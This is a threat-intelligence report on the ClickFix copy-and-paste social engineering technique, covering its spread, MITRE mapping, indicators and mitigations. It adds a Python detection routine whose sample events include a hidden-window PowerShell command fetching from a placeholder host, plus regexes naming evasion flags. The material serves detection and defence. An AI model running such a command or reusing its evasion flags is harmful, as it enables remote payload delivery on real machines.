Full Report
The ClickFix social engineering technique has become the second most common attack vector, behind only phishing, according to ESET research
Analysis Summary
# Tool/Technique: ClickFix
## Overview
ClickFix is a social engineering technique that manipulates victims into copying and pasting a malicious script and subsequently executing it on their system. It exploits the user's inclination to self-resolve perceived errors or verification issues, bypassing traditional security alerts. It has become the second most common attack vector reported in H1 2025, surging 517% in popularity.
## Technical Details
- Type: Technique/Social Engineering
- Platform: Windows, Linux, macOS (All major operating systems)
- Capabilities: Infection via user self-execution; delivery mechanism for various malware types.
- First Seen: March 2024 (first observed by Proofpoint).
## MITRE ATT&CK Mapping
*Note: As ClickFix is a delivery mechanism relying on user interaction to execute attacker-supplied code, the following mappings reflect the execution phase and initial access intent.*
- TA0005 - Defense Evasion
- T1204 - User Execution
- T1204.002 - Malicious File
- TA0001 - Initial Access
- T1566 - Phishing
- T1566.002 - Spearphishing Link (if the link leads to the instruction page or script)
## Functionality
### Core Capabilities
- Social engineering via fake error or verification messages.
- Tricking users into copying and pasting a malicious script.
- Relying on the victim to execute the pasted script, leading to self-infection and bypassing some perimeter defenses.
### Advanced Features
- Use of weaponized "builders" that others can purchase to rapidly create ClickFix landing pages.
- Versatility in delivering a wide array of subsequent malware payloads.
## Indicators of Compromise
- File Hashes: [No specific hashes provided in the context]
- File Names: [No specific file names provided in the context]
- Registry Keys: [Not specified]
- Network Indicators: [No specific C2/network indicators provided in the context]
- Behavioral Indicators: Execution of pasted scripts (e.g., PowerShell commands) initiated by direct user action following a deceptive prompt.
## Associated Threat Actors
- Unspecified threat actors, though the proliferation of builders suggests wider adoption across the cybercrime ecosystem.
## Detection Methods
- Signature-based detection: [To be developed based on specific script hashes/payloads being delivered]
- Behavioral detection: Detection of unusual execution patterns, especially commands being pasted directly into command-line interfaces or terminals by users outside of standard administrative routines.
- YARA rules: [Not available in context]
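One way to operationalise the behavioural detection above, as an added example that is not part of the original report or of ESET's research: a scoring pass over constructed Sysmon-style process-creation events that flags a shell launched interactively by a non-admin account with a hidden-window flag, execution-policy bypass or remote URL on its command line. The event shape, the parent and user allowlists, the weights and the regexes are all assumptions to be tuned per estate.

```python
import os
import re
from typing import Dict, List, Tuple
# Constructed process-creation events in a Sysmon Event ID 1-like shape. Field names,
# paths, users and the placeholder URL are assumptions for this example, not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\jdoe",
     "CommandLine": 'powershell -w hidden -c "iwr http://PLACEHOLDER.invalid/verify -UseBasicParsing"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\helpdesk-admin",
     "CommandLine": "powershell Get-Service -Name Spooler"},
    {"Image": r"C:\Windows\System32\cmd.exe", "User": r"NT AUTHORITY\SYSTEM",
     "ParentImage": r"C:\Program Files\SomeApp\updater.exe",
     "CommandLine": r'cmd /c "C:\Program Files\SomeApp\post-update.bat"'},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}  # interpreters a pasted one-liner lands in
INTERACTIVE_PARENTS = {"explorer.exe"}              # a person launched it, not a service or scheduler
ADMIN_USERS = {r"CORP\helpdesk-admin", r"NT AUTHORITY\SYSTEM"}  # standard admin routines (assumption)
ALERT_THRESHOLD = 4
# Weighted command-line heuristics; each pattern is an assumption to tune per estate.
HEURISTICS: List[Tuple[str, int, re.Pattern]] = [
    ("hidden window", 2, re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("execution policy bypass", 1, re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I)),
    ("remote URL in command line", 2, re.compile(r"https?://\S+", re.I)),
]

def _basename(path: str) -> str:
    return os.path.basename(path.replace("\\", "/")).lower()

def score_event(ev: Dict[str, str]) -> Tuple[int, List[str]]:
    """Risk score and the reasons behind it; (0, []) when the image is not a shell."""
    if _basename(ev["Image"]) not in SHELLS:
        return 0, []
    score, reasons = 0, []
    if _basename(ev["ParentImage"]) in INTERACTIVE_PARENTS:
        score, reasons = score + 1, reasons + ["launched interactively"]
    if ev["User"] not in ADMIN_USERS:
        score, reasons = score + 1, reasons + ["non-admin user"]
    for name, weight, pattern in HEURISTICS:
        if pattern.search(ev["CommandLine"]):
            score, reasons = score + weight, reasons + [name]
    return score, reasons

def find_clickfix_candidates(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Events at or above the threshold, with their reasons, for analyst triage."""
    scored = [(ev, *score_event(ev)) for ev in events]
    return [{"user": ev["User"], "score": s, "reasons": r}
            for ev, s, r in scored if s >= ALERT_THRESHOLD]
```

Only the first constructed event reaches the threshold; the admin's routine shell and the service-spawned batch file score below it, which is the "outside of standard administrative routines" distinction the bullet above draws.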
## Mitigation Strategies
- Prevention measures: User training emphasizing caution regarding prompts asking to copy/paste and run code, even if presented as 'fixes'.
- Hardening recommendations:
  - Implement application control policies that restrict execution of scripts from non-standard sources or user contexts.
  - Restrict PowerShell execution policies where possible.
  - Enable advanced endpoint detection and response (EDR) monitoring for suspicious process parenting or execution from atypical sources (e.g., clipboard interactions leading to execution).
## Related Tools/Techniques
- Phishing (the only attack vector reported more often than ClickFix)
- Clipboard compromise techniques (as the mechanism relies on clipboard interaction)
- Droppers/Loaders (the scripts delivered via ClickFix often function as droppers)